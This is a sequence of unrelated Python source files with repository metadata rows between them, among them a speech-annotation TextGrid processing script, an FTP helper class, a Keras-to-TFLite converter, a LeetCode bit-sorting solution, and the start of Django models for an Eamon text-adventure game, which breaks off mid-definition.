new_labelList.append([label[0], label[1], label[2]])
for new_label in new_labelList:
for sound in ['[' + chr(i) for i in range(97, 123)]:
if sound not in new_label[2]:
continue
else:
new_label[2] = re.sub(pattern, '', new_label[2])
return new_labelList
# ------------------------ StartEndCheck.log -----------------------
# *********** 检测 末尾音频是否留静默段 *******************
def is_blankEnd(filePath):
# print(get_fileName(filePath))
tg = tgio.openTextgrid(filePath)
firstTier = tg.tierDict[tg.tierNameList[0]]
maxTime = int(float(tg.maxTimestamp) * 100)
maxEndLabelTime = int(float(firstTier.entryList[-1][-2]) * 100)
# print('End——' + get_fileName(filePath) + ': ' + str(maxTime) + ' ' + str(maxEndLabelTime))
if maxTime == maxEndLabelTime:
return True
return False
# *********** 检测 开始音频是否留静默段 *******************
def is_blankStart(filePath):
tg = tgio.openTextgrid(filePath)
firstTier = tg.tierDict[tg.tierNameList[0]]
minTime = int(float(tg.minTimestamp) * 100)
minStartLabelTime = int(float(firstTier.entryList[0][0]) * 100)
# print(str(maxTime) + ' ' + str(minStartLabelTime))
if minTime == minStartLabelTime:
return True
return False
# *********** 检测末尾音频是否留静默段 *******************
def check_ends(dir_path=mark_path, modules=module_List, nums=num_List):
data_dirs = get_filePaths(dir_path)
data_dirs = mdl_filter_paths(data_dirs, modules)
data_dirs = num_filter_paths(data_dirs, nums)
data_dirs.sort()
ends_list = list()
for dir in data_dirs:
if is_blankEnd(dir):
ends_list.append(dir.split('/')[-1])
return ends_list
# *********** 检测末尾音频是否留静默段 *******************
def check_starts(dir_path=mark_path, modules=module_List, nums=num_List):
data_dirs = get_filePaths(dir_path)
data_dirs = mdl_filter_paths(data_dirs, modules)
data_dirs = num_filter_paths(data_dirs, nums)
data_dirs.sort()
starts_list = list()
for dir in data_dirs:
if is_blankStart(dir):
starts_list.append(dir.split('/')[-1])
return starts_list
# *********** 合并starts & ends dir列表 *******************
def combineSEDir(starts_list, ends_list):
combine_list = list()
for dir in starts_list:
if dir in ends_list:
combine_list.append(dir)
new_list = list()
for dir in starts_list:
if dir not in combine_list:
new_list.append(dir + ': Start')
for dir in ends_list:
if dir not in combine_list:
new_list.append(dir + ': End')
for dir in combine_list:
new_list.append(dir + ': Start/End')
return new_list
def checkSE(dir_path=mark_path, modules=module_List, nums=num_List, fileName=se_fileName):
ends_list = check_ends()
starts_list = check_starts()
list = combineSEDir(starts_list, ends_list)
writeLines2File(fileName, list)
# ------------------------ MarkCheck.txt -----------------------
def get_LabelList(filePath):
tg = tgio.openTextgrid(filePath)
firstTier = tg.tierDict[tg.tierNameList[0]]
labelList = [[entry[0], entry[1], entry[2]] for entry in firstTier.entryList]
return labelList
def isContentAbnormal(content, checkList):
for check in checkList:
if check in content:
return True
return False
def checkContents(path_list, content_checkList):
check_list = list()
for filePath in path_list:
labelList = get_LabelList(filePath)
for i in range(len(labelList)):
if isContentAbnormal(labelList[i][-1], content_checkList):
check_list.append((get_fileName(filePath), labelList[i][-1]))
return check_list
def checkMark(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName = mark_check_fileName):
"""
:param dir_path: str
:param modules: list
:param nums: list
:param fileName: str
:return:
"""
data_dirs = get_filePaths(dir_path)
data_dirs = pathFilter(data_dirs, ste_list=states, mdl_list=modules, num_list=nums)
check_list = checkContents(data_dirs, mark_checkList)
check_list = set(check_list)
check_list = list(check_list)
check_list.sort()
firstLine = '#Check Mark#' + '\n' \
'Checked Dir: ' + dir_path + '\n' \
+ 'Checked Label: ' + str(mark_checkList) + '\n'
writeLines2File(fileName, [check[0] + '\n' + check[1] + '\n' for check in check_list],
firstLine)
return
# ========================== SCP Process ================================
# ------------------------ Elder.scp -----------------------
# *********** 获取格式化数字 *******************
# 12位数,前方补0
# 单位:纳秒
#
def get_format_strNum_12(num):
dup_num = 10e7
return str(round(num * dup_num)).zfill(12)
# *********** 获取格式化数字 *******************
# 小数保留两位
# 单位:
#
def get_format_strNum_2(num):
return str(round(num * 100))
# *********** 根据文件名列表获取label内容 *******************
def get_scp(filePath, fileName_1):
scp_list = list()
labelList = get_LabelList(filePath)
fileName = get_fileName(filePath)
filtered_labelList = filter_sentence(labelList)
for i in range(len(filtered_labelList)):
start_time = filtered_labelList[i][0]
end_time = filtered_labelList[i][1]
print('fileName: ' + fileName_1)
if 'test' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4Test + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
continue
elif 'dev' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4Dev + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
continue
elif 'mci' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4MCI + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
elif 'ad' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4AD + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
elif 'SF' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4SF + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
elif 'ST' in fileName_1:
scp = fileName + '_' + get_format_strNum_12(start_time) + '_' + get_format_strNum_12(end_time) + \
feat4ST + fileName + '.pap[' + get_format_strNum_2(start_time) + ',' + get_format_strNum_2(end_time) + ']'
scp_list.append(scp)
return scp_list
# *********** 根据文件名列表获取scp内容 *******************
def get_scpList_from_textgrids(path_list, fileName=None):
scpList = list()
for path in path_list:
scps = get_scp(path, fileName)
for scp in scps:
scpList.append(scp)
return scpList
def get_scps(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName = scp_fileName):
"""
data_dirs = pathFilter(data_dirs, ste_list=states, num_list=nums, mdl_list=modules)
:param dir_path: str
:param states: List[str]
:param modules: List[str]
:param nums: List[int]
:param fileName: str
"""
data_dirs = get_filePaths(dir_path)
data_dirs = pathFilter(data_dirs, ste_list=states, num_list=nums, mdl_list=modules)
scps = get_scpList_from_textgrids(data_dirs, fileName)
scps.sort()
writeLines2File(fileName, scps)
# ========================== MLF Process ================================
# ------------------standard.mlf --------------------
# *********** 根据文件名列表获取mlf内容 *******************
def get_mlfList_from_textgrids(path_list):
stdList = list()
for path in path_list:
stds = get_mlf(path)
for std in stds:
stdList.append(std)
return stdList
# *********** 根据文件名列表获取stardard.mlf *******************
def get_mlf(filePath):
std_list = list()
tg = tgio.openTextgrid(filePath)
firstTier = tg.tierDict[tg.tierNameList[0]]
labelList = [[entry[0], entry[1], entry[2]] for entry in firstTier.entryList]
fileName = get_fileName(filePath)
print('fileName: ' + fileName)
filtered_labelList = filter_sentence(labelList)
for i in range(len(filtered_labelList)):
# print(filtered_labelList[i][2])
std = '\"' + fileName + '_' + get_format_strNum_12(filtered_labelList[i][0]) + '_' + get_format_strNum_12(
filtered_labelList[i][1]) + '.lab\"\n'
for word in filtered_labelList[i][2]:
std += word + '\n'
std += '.'
# print(std)
std_list.append(std)
return std_list
def get_mlfs(dir_path=mark_path, states=state_List, modules=module_List, nums=num_List, fileName=mlf_fileName):
"""
生成standard.mlf
:param dir_path: list
:param modules: list
:param nums: list
:param fileName: str
"""
data_dirs = get_filePaths(dir_path)
data_dirs = pathFilter(data_dirs, ste_list=states, num_list=nums, mdl_list=modules)
stds = get_mlfList_from_textgrids(data_dirs)
stds.sort()
with open(fileName, 'w', encoding='gbk') as f:
f.write('#!MLF!#\n')
for line in stds:
f.write(line + '\n')
# ========================== Main ================================
if __name__ == '__main__':
# get_scps(states=state_Normal, nums=num_List4Dev, modules=module_List4U, fileName=scp_fileName4Dev)
# get_mlfs(states=state_Normal, nums=num_List4Dev, modules=module_List4U, fileName=mlf_fileName4Dev)
# get_scps(states=state_Normal, nums=num_List4Test, modules=module_List4U, fileName=scp_fileName4Test)
# get_mlfs(states=state_Normal, nums=num_List4Test, fileName=mlf_fileName4Test)
# get_scps(states=state_MCI, nums=num_List4MCI, modules=module_List4U, fileName=scp_fileName4MCI)
# get_mlfs(states=state_MCI, nums=num_List4MCI, fileName=mlf_fileName4MCI)
# get_scps(states=state_AD, nums=num_List4AD, modules=module_List4U, fileName=scp_fileName4AD)
# get_scps(states=state_List, nums=num_List4AllexptTrain, modules=['SF'], fileName=scp_fileName4SFnotTrain)
get_scps(states=state_List, nums=num_List, modules=['SF'], fileName=scp_fileName4SF)
# get_mlfs(states=state_AD, nums=num_List4AD, fileName=mlf_fileName4AD)
# get_mlfs(states=state_List, nums=num_List, modules=module_List4F, fileName='standard_all4M_addSF.mlf')
# get_labels(states=state_List, modules=module_List, nums=num_List, fileName=L_fimeName4All)
# get_labels(states=state_Normal, modules=module_List4U, nums=num_List4Dev, fileName=L_fileName4Dev)
# get_labels(states=state_Normal, modules=module_List4R, nums=num_List4Train, fileName=L_fileName4Train)
# get_labels(states=state_Normal, modules=module_List4F, nums=num_List4Train, fileName='L_addSF.txt')
# get_labels(states=state_Normal, modules=['SF'], nums=num_List4Dev, fileName=L_fileName4Dev_SF)
# get_labels(states=state_Normal, modules=['SF'], nums=num_List4Test, fileName=L_fileName4Test_SF)
# get_labels(states=state_Normal, modules=['PD'], nums=num_List4Test, fileName=L_fileName4Test_PD)
# get_labels(states=state_Normal, modules=['SI'], nums=num_List4Test, fileName=L_fileName4Test_SI)
# get_labels(states=state_Normal, modules=['SR'], nums=num_List4Test, fileName=L_fileName4Test_SR)
# get_labels(states=state_Normal, modules=['SS'], nums=num_List4Test, fileName=L_fileName4Test_SS)
# get_scps(states=state_List, nums=num_List, modules=['SF'], fileName=scp_fileName4SF)
# checkSE()
# checkMark()
# 复制所有文件到同一文件夹下
# data_dirs = get_data_list(data_path)
# copyFiles2Dir(data_dirs, dir_path)
| [
"panjingshen@SystemE.local"
] | panjingshen@SystemE.local |
ab0ee7884f8c23d456df902c932e3ff95f458850 | 7d54aac98a37811dd039b5027c4efeea0b411c8c | /migrate.py | 11620f259f02ba292af0fa5a56d2240a3a9c9260 | [] | no_license | mmoallemi99/serverless-micro-django | be7f54747e8763b222a8f3e4ef61b2088a7d8a8f | 9a9af78277add0a1f1bae70ff46628f72e1061f0 | refs/heads/master | 2023-01-11T03:43:18.854616 | 2020-11-15T10:19:39 | 2020-11-15T10:19:39 | 296,683,346 | 15 | 0 | null | null | null | null | UTF-8 | Python | false | false | 257 | py | import os
import django
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'serverless_micro_django.settings')
django.setup()
from django.core import management
from django.core.management.commands import migrate
management.call_command(migrate.Command())
| [
"mohammadmoallemi@outlook.com"
] | mohammadmoallemi@outlook.com |
e99014e61287b1074dd218fa089c6f965099a281 | 777c59386be4730e07b407d79492ef51b5d0f7a7 | /h5_to_tflite.py | dd3d7f56e6b6030f5de1ecdc056dd2e07a6b5cc9 | [] | no_license | pandongwei/test_raspberry | c899b202c5248a65c0d9f2cce1b3b755cd545490 | 9187c6ee278f4767df1728a7f784ba95af806cc9 | refs/heads/master | 2021-04-14T10:23:57.478606 | 2020-04-18T13:32:11 | 2020-04-18T13:32:11 | 249,226,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 662 | py | #from keras.backend import clear_session
import numpy as np
import tensorflow as tf
#clear_session()
np.set_printoptions(suppress=True)
input_graph_name = '/home/pan/master-thesis-in-mrt/test_raspberry/train_result/network/large_model_final.h5'
output_graph_name = '/home/pan/master-thesis-in-mrt/test_raspberry/train_result/network/MobileNetV3_large_weights_89.50%_89.99%_93.68%.tflite'
converter = tf.lite.TFLiteConverter.from_keras_model_file(model_file=input_graph_name)
converter.post_training_quantize = False #是否量化的选项
tflite_model = converter.convert()
open(output_graph_name, "wb").write(tflite_model)
print("generate:",output_graph_name) | [
"usrki@student.kit.edu"
] | usrki@student.kit.edu |
9e5753bf090df4234b05b12bebf37875bf37987e | c99c1d41215b91237b7f6d63dcf0ac23b0dc1137 | /FTPManager.py | 6fcbeeefa6ae40090cda153f17159c1b01f4845f | [] | no_license | hugosoftdev/B3_FTP_BOT | 26bcba525d1676587b4d40d2701b0e1d56aae30f | 21971a72a05986f2a9e1ad02890840e4d16ac452 | refs/heads/master | 2020-07-08T22:45:01.575323 | 2019-09-03T14:49:20 | 2019-09-03T14:49:20 | 203,801,270 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | import ftplib
import os
from io import BytesIO
from helper import randomString
class FTPManager:
def __init__(self, host,username=None,password=None):
self.host = host
self.username = username
self.password = password
self.connection = ftplib.FTP(host)
self.folderPath = None
self.isLogged = False
def Login(self):
if(self.username != None and self.password != None):
self.connection.login(self.username, self.password)
else:
self.connection.login()
self.isLogged = True
def IsLoggedIn(self):
return self.isLogged
def VerifyLogin(self):
if(not self.IsLoggedIn()):
raise Exception("You must be logged in first")
def SetFolderPath(self,path):
self.VerifyLogin()
self.folderPath = path
self.connection.cwd(path)
def ListFolderFiles(self):
if(self.folderPath != None):
fileNames = []
self.connection.dir(fileNames.append)
fileNames = [x.split(" ")[-1] for x in fileNames]
return fileNames
else:
raise Exception("You must set the folder directory first")
def DownloadFile(self, fileName):
myfile = BytesIO()
self.connection.retrbinary('RETR ' + fileName, myfile.write)
myfile.seek(0)
return myfile
| [
"hugospm@al.insper.edu.br"
] | hugospm@al.insper.edu.br |
f5c263ff57f2af9eca8b0cb37427ffd481a5c178 | 2a54e8d6ed124c64abb9e075cc5524bb859ba0fa | /.history/2-Python-Basics-part2/4-ternary-operator_20200413230611.py | 18fc81dee16c1d156f9fe477dc7652c5da62075c | [] | no_license | CaptainStorm21/Python-Foundation | 01b5fbaf7a913506518cf22e0339dd948e65cea1 | a385adeda74f43dd7fb2d99d326b0be23db25024 | refs/heads/master | 2021-05-23T01:29:18.885239 | 2020-04-23T19:18:06 | 2020-04-23T19:18:06 | 253,171,611 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 38 | py | # conditonal expressions
condition_if | [
"tikana4@yahoo.com"
] | tikana4@yahoo.com |
943b6c28ec80a06df2c17590ab5913fb9889f5f1 | 552e0e8a8eff328e346627ee2dd14aec7d8cdfb0 | /4001 - 5000/4760 Move zeroes | Python.py | 74df3857599735aa3a10250063c0216de678b9aa | [] | no_license | tentacion098/e-olymp-solutions | f79107faedd39731e0b2428652547c293f7305f4 | 3229597c7f9eca41d1de9f1b8595eae9dfe7fc38 | refs/heads/master | 2023-05-02T02:51:59.701042 | 2021-05-15T18:58:04 | 2021-05-15T18:58:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 217 | py | n = input()
nonzero = []
zeroes = []
ededler = [int(j) for j in input().split()]
for i in ededler:
if(i != 0):
nonzero.append(i)
if(i == 0):
zeroes.append(i)
print(*(nonzero + zeroes), end="")
| [
"noreply@github.com"
] | noreply@github.com |
9da6da5fba9daedf9b2e92c80aa332916e18eeae | 659653ebdff3d70e0c04cd0292e489dc537b4112 | /setup.py | 709ece69ddc3e6068b1178071932256215b94e81 | [] | no_license | vangheem/clouddrive | 48de3dd21f66c4ea207e6cbfefff630825349bb3 | 1b0e74dd4e9cd3dc838a3c13866ccef8a3920b63 | refs/heads/master | 2021-01-10T02:11:52.997944 | 2016-09-20T02:30:51 | 2016-09-20T02:30:51 | 48,830,570 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 863 | py | # -*- coding: utf-8 -*-
import os
from setuptools import setup
from setuptools import find_packages
def read(*rnames):
return open(os.path.join(os.path.dirname(__file__), *rnames)).read()
setup(
name='clouddrive',
version='0.1.dev0',
description='',
long_description='',
classifiers=[
"Programming Language :: Python",
],
author='Nathan Van Gheem',
author_email='nathan@vangheem.us',
url='',
license='BSD',
packages=find_packages(exclude=['ez_setup']),
install_requires=[
'requests',
'flask',
'ZEO',
'ZODB',
'python-dateutil'
],
entry_points="""
# -*- Entry points: -*-
[console_scripts]
run-server = clouddrive:run_server
run-monitor = clouddrive.monitor:run
""",
include_package_data=True,
zip_safe=False,
)
| [
"vangheem@gmail.com"
] | vangheem@gmail.com |
6a7cc2d596827c9bde48ed3927efac4efb6ee38c | 1ffbdfff2c9632fa8ecd6288578e1d02f740ee23 | /2020_/07/LeetCodeBitManipulation/03E_1356. Sort Integers by The Number of 1 Bits.py | dc2f4d00cc3f90c25830cf14864e295c482b40d1 | [] | no_license | taesookim0412/Python-Algorithms | c167c130adbe04100d42506c86402e729f95266c | c6272bbcab442ef32f327f877a53ee6e66d9fb00 | refs/heads/main | 2023-05-01T09:40:44.957618 | 2021-05-12T10:52:30 | 2021-05-12T10:52:30 | 366,682,846 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 780 | py | import collections
import numpy as np
from typing import List
#Runtime: 72 ms, faster than 68.71% of Python3 online submissions for Sort Integers by The Number of 1 Bits.
#Memory Usage: 13.8 MB, less than 86.25% of Python3 online submissions for Sort Integers by The Number of 1 Bits.
class Solution:
def sortByBits(self, arr: List[int]) -> List[int]:
arr.sort()
data = collections.defaultdict(list)
res = []
for i in range(len(arr)):
numberOfOnes = str(bin(arr[i])).count('1')
data[numberOfOnes] += arr[i],
for key, val in sorted(data.items()):
print(key,val)
res += val
return res
s = Solution()
print(s.sortByBits([0,1,2,3,4,5,6,7,8]))
print(s.sortByBits([10,100,1000,10000])) | [
"taesoo.kim0412@gmail.com"
] | taesoo.kim0412@gmail.com |
cfbd6b9b962886737f7fde0c1dd2f399f97d3ffe | d721258b53f0f44b1010cb8e8efac8e2a5c96c26 | /adventure/models.py | babb8aa7915cc58b6585820f8664bb9817390484 | [
"LicenseRef-scancode-proprietary-license",
"MIT"
] | permissive | kdechant/eamon | a6662285f51a6cad5797bb9be92ca709ae36921c | 080a43aa80c3a1605c402e68616545a8e9c7975c | refs/heads/master | 2023-05-24T08:20:18.551604 | 2022-08-14T10:27:01 | 2023-04-08T07:31:45 | 49,559,304 | 28 | 7 | MIT | 2023-03-14T21:09:55 | 2016-01-13T08:07:28 | TypeScript | UTF-8 | Python | false | false | 22,320 | py | from django.db import models
from taggit.managers import TaggableManager
ARTIFACT_TYPES = (
(0, 'Gold'),
(1, 'Treasure'),
(2, 'Weapon'),
(3, 'Magic Weapon'),
(4, 'Container'),
(5, 'Light Source'),
(6, 'Drinkable'),
(7, 'Readable'),
(8, 'Door/Gate'),
(9, 'Edible'),
(10, 'Bound Monster'),
(11, 'Wearable'), # armor/shield
(12, 'Disguised Monster'),
(13, 'Dead Body'),
(14, 'User 1'),
(15, 'User 2'),
(16, 'User 3'),
)
AXE = 1
BOW = 2
CLUB = 3
SPEAR = 4
SWORD = 5
WEAPON_TYPES = (
(AXE, 'Axe'),
(BOW, 'Bow'),
(CLUB, 'Club'),
(SPEAR, 'Spear'),
(SWORD, 'Sword')
)
CLOTHING_TYPES = (
(0, 'Clothes or Armor/Shield'),
(1, 'Coats, Capes, etc.'),
(2, 'Shoes, boots'),
(3, 'Gloves'),
(4, 'Hats, headwear'),
(5, 'Jewelry'),
(6, 'Undergarments'),
)
ARMOR_TYPES = (
(0, 'Armor'),
(1, 'Shield'),
(2, 'Helmet'),
(3, 'Gloves'),
(4, 'Ring'),
)
MARKDOWN_CHOICES = [(False, "Plain text"), (True, "Markdown")]
class Author(models.Model):
name = models.CharField(max_length=50)
def __str__(self):
return self.name
class Adventure(models.Model):
name = models.CharField(max_length=50)
description = models.TextField(default='', blank=True)
full_description = models.TextField(default='', blank=True)
intro_text = models.TextField(
default='', blank=True,
help_text="Text shown to the adventurer when they begin the adventure. Use this to set up the story. Split"
" it into multiple pages by using a line containing three hyphens as a break. Supports Markdown."
)
intro_question = models.TextField(
default='', blank=True,
help_text="If you want to ask the adventurer a question when they start the adventure, put"
" the question text here. The answer will be available in the game object."
)
slug = models.SlugField(null=True)
edx = models.CharField(null=True, max_length=50, blank=True)
edx_version = models.FloatField(default=0, blank=True, null=True)
edx_room_offset = models.IntegerField(default=0, null=True, blank=True)
edx_artifact_offset = models.IntegerField(default=0, null=True, blank=True)
edx_effect_offset = models.IntegerField(default=0, null=True, blank=True)
edx_monster_offset = models.IntegerField(default=0, null=True, blank=True)
edx_program_file = models.CharField(null=True, max_length=50, blank=True)
directions = models.IntegerField(default=6)
dead_body_id = models.IntegerField(
default=0, blank=True, null=True,
help_text="The artifact ID of the first dead body. Leave blank to not use dead body artifacts.")
active = models.BooleanField(default=0)
# the first and last index of hints read from the hints file - used with the import_hints management command
first_hint = models.IntegerField(null=True, blank=True)
last_hint = models.IntegerField(null=True, blank=True)
date_published = models.DateField(null=True, blank=True)
featured_month = models.CharField(null=True, blank=True, max_length=7)
tags = TaggableManager(blank=True)
authors = models.ManyToManyField(Author)
def __str__(self):
return self.name
@property
def times_played(self):
return ActivityLog.objects.filter(type='start adventure', adventure_id=self.id).count()
@property
def avg_ratings(self):
return self.ratings.all().aggregate(models.Avg('overall'), models.Avg('combat'), models.Avg('puzzle'))
@property
def rooms_count(self):
return Room.objects.filter(adventure_id=self.id).count()
@property
def artifacts_count(self):
return Artifact.objects.filter(adventure_id=self.id).count()
@property
def effects_count(self):
return Effect.objects.filter(adventure_id=self.id).count()
@property
def monsters_count(self):
return Monster.objects.filter(adventure_id=self.id).count()
class Meta:
ordering = ['name']
class Room(models.Model):
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='rooms')
room_id = models.IntegerField(default=0) # The in-game room ID.
name = models.CharField(max_length=255)
is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
description = models.TextField(max_length=1000)
# The ID of an effect to display after the description
effect = models.IntegerField(null=True, blank=True)
# The ID of an effect to display after the description, without a paragraph break.
effect_inline = models.IntegerField(null=True, blank=True)
is_dark = models.BooleanField(default=False)
dark_name = models.CharField(null=True, blank=True, max_length=255,
help_text="The name shown if the room is dark and the player doesn't have a light. "
"Leave blank to use the standard 'in the dark' message.")
dark_description = models.TextField(
null=True, blank=True, max_length=1000,
help_text="The description shown if the room is dark and the player doesn't"
" have a light. Leave blank to use the standard 'it's too dark to see' message.")
data = models.TextField(
max_length=1000, null=True, blank=True,
help_text="Adventure-specific data for this room, e.g., room type or environment "
"(road, cave, snow, etc.). Data can be used in custom code. Enter as a "
"JSON object."
)
def __str__(self):
return self.name
class RoomExit(models.Model):
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='room_exits', null=True)
direction = models.CharField(max_length=2)
room_from = models.ForeignKey(Room, on_delete=models.CASCADE, related_name='exits')
room_to = models.IntegerField(default=0) # Not a real foreign key. Yet.
door_id = models.IntegerField(null=True, blank=True)
effect_id = models.IntegerField(null=True, blank=True,
help_text="The effect will be shown when the player moves in this direction. "
"You can also enter a zero for the connection and an effect ID to set up "
"a custom message on a non-existent exit, e.g., if the player can't go in"
" the ocean without a boat, etc.")
def __str__(self):
return str(self.room_from) + " " + self.direction
def save(self, **kwargs):
if self.room_from and self.adventure_id != self.room_from.adventure_id:
self.adventure_id = self.room_from.adventure_id
super().save(**kwargs)
class Artifact(models.Model):
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='artifacts')
artifact_id = models.IntegerField(default=0) # The in-game artifact ID.
article = models.CharField(max_length=20, null=True, blank=True,
help_text="Optional article or adjective that appears before the name, "
"e.g., 'a', 'the', 'some'.")
name = models.CharField(max_length=255)
synonyms = models.CharField(
null=True, max_length=255, blank=True,
help_text="Other terms for this artifact. E.g., if the artifact name is 'secret door in"
" north wall' you could have a synonym of 'door' to help the player find it.")
is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
description = models.TextField(max_length=1000)
# The ID of an effect to display after the description
effect = models.IntegerField(null=True, blank=True)
# The ID of an effect to display after the description, without a paragraph break.
effect_inline = models.IntegerField(null=True, blank=True)
room_id = models.IntegerField(
null=True, blank=True,
help_text="If in a room, the room ID"
)
monster_id = models.IntegerField(
null=True, blank=True,
help_text="If carried by a monster, the monster ID"
)
container_id = models.IntegerField(
null=True, blank=True,
help_text="If in a container, the container ID"
)
guard_id = models.IntegerField(
null=True, blank=True,
help_text="If a bound monster, the ID of a monster that prevents the player from freeing it. For other "
"artifact types, the ID of a monster that prevents the player from picking it up."
)
weight = models.IntegerField(
default=0,
help_text="Weight in Gronds. Enter -999 for something that can't be picked up, or 999 to show the message "
"'Don't be absurd' if the player tries to pick it up."
)
value = models.IntegerField(default=0)
type = models.IntegerField(null=True, choices=ARTIFACT_TYPES)
is_worn = models.BooleanField(default=False)
is_open = models.BooleanField(default=False)
key_id = models.IntegerField(
null=True, blank=True,
help_text="If a container, door, or bound monster, the artifact ID of the key that opens it"
)
linked_door_id = models.IntegerField(
null=True, blank=True,
help_text="To make a two-sided door, enter the artifact ID of the other side of the door. "
"They will open and close as a set."
)
hardiness = models.IntegerField(
null=True, blank=True,
help_text="If a door or container that can be smashed open, how much damage does it take to open it?")
weapon_type = models.IntegerField(null=True, blank=True, choices=WEAPON_TYPES)
hands = models.IntegerField(default=1, choices=(
(1, 'One-handed'),
(2, 'Two-handed')
))
weapon_odds = models.IntegerField(null=True, blank=True)
dice = models.IntegerField(null=True, blank=True)
sides = models.IntegerField(null=True, blank=True)
clothing_type = models.IntegerField(null=True, choices=CLOTHING_TYPES, help_text="Reserved for future use.")
armor_class = models.IntegerField(
null=True, default=0,
help_text="(Armor only) How many hits does this armor protect against?"
)
armor_type = models.IntegerField(null=True, blank=True, choices=ARMOR_TYPES)
armor_penalty = models.IntegerField(
default=0, null=True,
help_text="(Armor only) How much does this reduce the player's chance to hit, if they don't have enough "
"armor expertise?"
)
get_all = models.BooleanField(
default=True,
help_text="Will the 'get all' command pick up this item?"
)
embedded = models.BooleanField(
default=False,
help_text="Check this box to make the item not appear in the artifacts list until the player looks at it.")
hidden = models.BooleanField(
default=False,
help_text="(For secret doors only) Check this box for embedded secret doors, so that the player can't "
"pass through them before finding them.")
quantity = models.IntegerField(
null=True, blank=True,
help_text="Drinks or bites, fuel for light source, etc."
)
effect_id = models.IntegerField(
null=True, blank=True,
help_text="First effect ID for Readable artifacts"
)
num_effects = models.IntegerField(
null=True, blank=True,
help_text="Number of effects for Readable artifacts"
)
data = models.TextField(
max_length=1000, null=True, blank=True,
help_text="Adventure-specific data for this artifact, e.g., elemental weapon, etc."
"Enter as a JSON object."
)
def __str__(self):
return self.name
class ArtifactMarking(models.Model):
"""
Markings on a readable artifact
"""
artifact = models.ForeignKey(Artifact, on_delete=models.CASCADE)
marking = models.TextField(max_length=65535)
class Effect(models.Model):
STYLES = (
('', 'Normal'),
('emphasis', 'Bold'),
('success', 'Success (green)'),
('special', 'Special 1 (blue)'),
('special2', 'Special 1 (purple)'),
('warning', 'Warning (orange)'),
('danger', 'Danger (red)'),
)
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='effects')
effect_id = models.IntegerField(default=0) # The in-game effect ID.
is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
text = models.TextField(max_length=65535)
style = models.CharField(max_length=20, null=True, blank=True, choices=STYLES) # display effect text in color
next = models.IntegerField(null=True, blank=True,
help_text="The next chained effect. Used with EDX conversions.")
next_inline = models.IntegerField(null=True, blank=True,
help_text="The next chained effect, no line break. Used with EDX conversions.")
def __str__(self):
return self.text[0:50]
class Monster(models.Model):
FRIENDLINESS = (
('friend', 'Always Friendly'),
('neutral', 'Always Neutral'),
('hostile', 'Always Hostile'),
('random', 'Random'),
)
COMBAT_CODES = (
(1, "Attacks using generic ATTACK message (e.g., slime, snake, bird)"),
(0, "Uses weapon, or with natural weapons if specified (default)"),
(-1, "Use weapon if it has one, otherwise natural weapons"),
(-2, "Never fights"),
)
adventure = models.ForeignKey(Adventure, on_delete=models.CASCADE, related_name='monsters')
monster_id = models.IntegerField(default=0) # The in-game monster ID.
article = models.CharField(max_length=20, null=True, blank=True,
help_text="Optional article or adjective that appears before the name, "
"e.g., 'a', 'the', 'some'. Does not apply to group monsters.")
name = models.CharField(max_length=255)
name_plural = models.CharField(
max_length=255, null=True, blank=True,
help_text="The plural form of the name. Used only with group monsters.")
synonyms = models.CharField(
null=True, max_length=255, blank=True,
help_text="Other names used for this monster. If the name is 'python' a synonym might be 'snake'")
is_markdown = models.BooleanField(default=False, choices=MARKDOWN_CHOICES, verbose_name="Text format")
description = models.TextField(max_length=1000)
# The ID of an effect to display after the description
effect = models.IntegerField(null=True, help_text="Used only with EDX conversions")
# The ID of an effect to display after the description, without a paragraph break.
effect_inline = models.IntegerField(null=True, help_text="Used only with EDX conversions")
count = models.IntegerField(default=1)
hardiness = models.IntegerField(default=12)
agility = models.IntegerField(default=12)
friendliness = models.CharField(max_length=10, choices=FRIENDLINESS)
friend_odds = models.IntegerField(default=50,
help_text="Used only when 'Friendliness' is 'Random'"
)
combat_code = models.IntegerField(default=0, choices=COMBAT_CODES)
courage = models.IntegerField(default=100)
pursues = models.BooleanField(default=True, help_text="Will the monster pursue a fleeing player?")
room_id = models.IntegerField(null=True, blank=True)
container_id = models.IntegerField(
null=True, blank=True,
help_text="Container artifact ID where this monster starts. The monster will enter the room as soon as the "
"container is opened. e.g., a vampire who awakes when you open his coffin"
)
gender = models.CharField(max_length=6, choices=(
('male', 'Male'),
('female', 'Female'),
('none', 'None'),
), null=True, blank=True)
weapon_id = models.IntegerField(
null=True, blank=True,
help_text="Enter an artifact ID, or zero for natural weapons. Leave blank for no weapon.")
attack_odds = models.IntegerField(
default=50,
